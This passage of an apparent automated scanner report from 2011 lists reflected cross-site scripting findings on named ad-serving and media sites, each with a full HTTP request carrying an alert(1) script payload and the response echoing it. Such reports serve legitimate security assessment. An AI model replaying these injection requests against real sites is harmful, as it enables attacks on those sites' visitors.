The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d379f"><script>alert(1)</script>cdd4cac9c4c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/auditude_entertainment_videod379f"><script>alert(1)</script>cdd4cac9c4c/preroll/vast/sx/ss/a/@x75 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 375
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:13:42 GMT;path=/;httponly
<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/auditude_entertainment_videod379f"><script>alert(1)</script>cdd4cac9c4c/preroll/vast/sx/ss/a/1859115549/x75/default/empty.gif/4d686437616b357a3837594141787878?" target="_top"> ...[SNIP]...
4.135. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]
Summary
Severity: High
Confidence: Certain
Host: http://network.realmedia.com
Path: /RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75
Issue detail
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7095e"><script>alert(1)</script>372b13aff79 was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x757095e"><script>alert(1)</script>372b13aff79 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:13:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 358
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:14:57 GMT;path=/;httponly
<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/auditude_news_video/preroll/vast/sx/ss/a/2010045325/x757095e"><script>alert(1)</script>372b13aff79/default/empty.gif/4d686437616b357a3837594141787878?" target="_top"> ...[SNIP]...
4.136. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://network.realmedia.com
Path: /RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2129"><script>alert(1)</script>3d7659e830d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/auditude_news_videof2129"><script>alert(1)</script>3d7659e830d/preroll/vast/sx/ss/a/@x75 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:13:43 GMT;path=/;httponly
<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/auditude_news_videof2129"><script>alert(1)</script>3d7659e830d/preroll/vast/sx/ss/a/92301275/x75/default/empty.gif/4d686437616b357a3837594141787878?" target="_top"> ...[SNIP]...
4.137. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://oascentral.bostonherald.com
Path: /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c158e"><script>alert(1)</script>74eb6653c9a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.comc158e"><script>alert(1)</script>74eb6653c9a/video/129334548@x91 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:52:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 363
Content-Type: text/html
Cache-Control: private
Content-Length: 363
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.comc158e"><script>alert(1)</script>74eb6653c9a/video/1085717019/x91/default/empty.gif/4d686437616b357a2f4b554143616d4f?x" target="_top"> ...[SNIP]...
4.138. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://oascentral.bostonherald.com
Path: /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6438"><script>alert(1)</script>21e8c03b3a3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/videob6438"><script>alert(1)</script>21e8c03b3a3/129334548@x91 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:53:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 363
Content-Type: text/html
Cache-Control: private
Content-Length: 363

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/videob6438"><script>alert(1)</script>21e8c03b3a3/1734057116/x91/default/empty.gif/4d686437616b357a2f4b554143616d4f?x" target="_top"> ...[SNIP]...
4.139. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 6]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://oascentral.bostonherald.com |
| Path: | /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f12c6"><script>alert(1)</script>11ed6697784 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91f12c6"><script>alert(1)</script>11ed6697784 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:53:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 354
Content-Type: text/html
Cache-Control: private
Content-Length: 354

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/video/533636951/x91f12c6"><script>alert(1)</script>11ed6697784/default/empty.gif/4d686437616b357a2f4b554143616d4f?x" target="_top"> ...[SNIP]...
4.140. http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090 [callback parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://pglb.buzzfed.com |
| Path: | /63857/8b52baa86e5b07ac085974feb13e2090 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6767c<script>alert(1)</script>579e3c6c8aa was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /63857/8b52baa86e5b07ac085974feb13e2090?callback=BF_PARTNER.gate_response6767c<script>alert(1)</script>579e3c6c8aa&cb=8827 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 00:58:05 GMT
Date: Sat, 17 Sep 2011 00:58:05 GMT
Connection: close

BF_PARTNER.gate_response6767c<script>alert(1)</script>579e3c6c8aa(1316209757);
4.141. http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27 [callback parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://pglb.buzzfed.com |
| Path: | /63857/bb0a99aabad3110617eff2ef79bb3c27 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cffa8<script>alert(1)</script>3083eeb5b42 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /63857/bb0a99aabad3110617eff2ef79bb3c27?callback=BF_PARTNER.gate_responsecffa8<script>alert(1)</script>3083eeb5b42&cb=6085 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 01:01:56 GMT
Date: Sat, 17 Sep 2011 01:01:56 GMT
Connection: close

BF_PARTNER.gate_responsecffa8<script>alert(1)</script>3083eeb5b42(1316190553);
4.142. http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7 [callback parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://pglb.buzzfed.com |
| Path: | /63857/d9dfb925d83ec9decb12af7e255ebee7 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e276d<script>alert(1)</script>39fac306275 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /63857/d9dfb925d83ec9decb12af7e255ebee7?callback=BF_PARTNER.gate_responsee276d<script>alert(1)</script>39fac306275&cb=984 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 00:59:19 GMT
Date: Sat, 17 Sep 2011 00:59:19 GMT
Connection: close

BF_PARTNER.gate_responsee276d<script>alert(1)</script>39fac306275(1316110396);
4.143. http://pixel.adsafeprotected.com/jspix [anId parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://pixel.adsafeprotected.com |
| Path: | /jspix |
Issue detail
The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8f9e"-alert(1)-"4993f914f2 was submitted in the anId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144d8f9e"-alert(1)-"4993f914f2&pubId=454&campId=179530 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A85C4E9B1CE6AFEC2478698F24E6FB3D; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:34 GMT
Connection: close

var adsafeVisParams = { mode : "jspix", jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0", adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafeprotected.com/", reqquery : "anId=144d8f9e"-alert(1)-"4993f914f2&pubId=454&campId=179530", debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", killPhrases : "", asid : "gt6av5mn" };
(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="t ...[SNIP]...
4.144. http://pixel.adsafeprotected.com/jspix [campId parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://pixel.adsafeprotected.com |
| Path: | /jspix |
Issue detail
The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8394"-alert(1)-"5aa455f48a3 was submitted in the campId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=454&campId=179530a8394"-alert(1)-"5aa455f48a3 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B1CD64CE4ACF13A13714A33EC4F9E56D; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:37 GMT
Connection: close

var adsafeVisParams = { mode : "jspix", jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0", adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafeprotected.com/", reqquery : "anId=144&pubId=454&campId=179530a8394"-alert(1)-"5aa455f48a3", debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", killPhrases : "", asid : "gt6av7iz" };
(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I={ ...[SNIP]...
4.145. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://pixel.adsafeprotected.com |
| Path: | /jspix |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af364"-alert(1)-"9591c354c26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=454&campId=179530&af364"-alert(1)-"9591c354c26=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D8F12D5393B81356B131F4FF06E12958; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:37 GMT
Connection: close

var adsafeVisParams = { mode : "jspix", jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0", adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafeprotected.com/", reqquery : "anId=144&pubId=454&campId=179530&af364"-alert(1)-"9591c354c26=1", debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", killPhrases : "", asid : "gt6av7ya" };
(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I ...[SNIP]...
4.146. http://pixel.adsafeprotected.com/jspix [pubId parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://pixel.adsafeprotected.com |
| Path: | /jspix |
Issue detail
The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a0dd"-alert(1)-"c19b890ed0c was submitted in the pubId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=4541a0dd"-alert(1)-"c19b890ed0c&campId=179530 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA4ADE180D50AB2EABEDD27FA7E62877; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:36 GMT
Connection: close

var adsafeVisParams = { mode : "jspix", jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0", adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafeprotected.com/", reqquery : "anId=144&pubId=4541a0dd"-alert(1)-"c19b890ed0c&campId=179530", debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", killPhrases : "", asid : "gt6av6jf" };
(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var ...[SNIP]...
4.147. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]
Summary
| Severity: | High |
| Confidence: | Firm |
| Host: | http://qa.n7.vp2.abc.go.com |
| Path: | /crossdomain.xml |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 775ff<a>a5eff5e8762 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /crossdomain.xml775ff<a>a5eff5e8762 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]
Response
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:06:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5943
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Error - 404 </title> ...[SNIP]... <div id="exception"> exception 'Zend_Controller_Dispatcher_Exception' with message 'Invalid controller specified (crossdomain.xml775ff<a>a5eff5e8762)' in /data/ZendFramework-1.10.8/library/Zend/Controller/Dispatcher/Standard.php:248 Stack trace: #0 /data/ZendFramework-1.10.8/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standa ...[SNIP]...
4.148. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://qa.n7.vp2.abc.go.com |
| Path: | /crossdomain.xml |
Issue detail
The value of REST URL parameter 1 is copied into an HTML comment. The payload 650a7--><script>alert(1)</script>b7520712271 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /crossdomain.xml650a7--><script>alert(1)</script>b7520712271 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
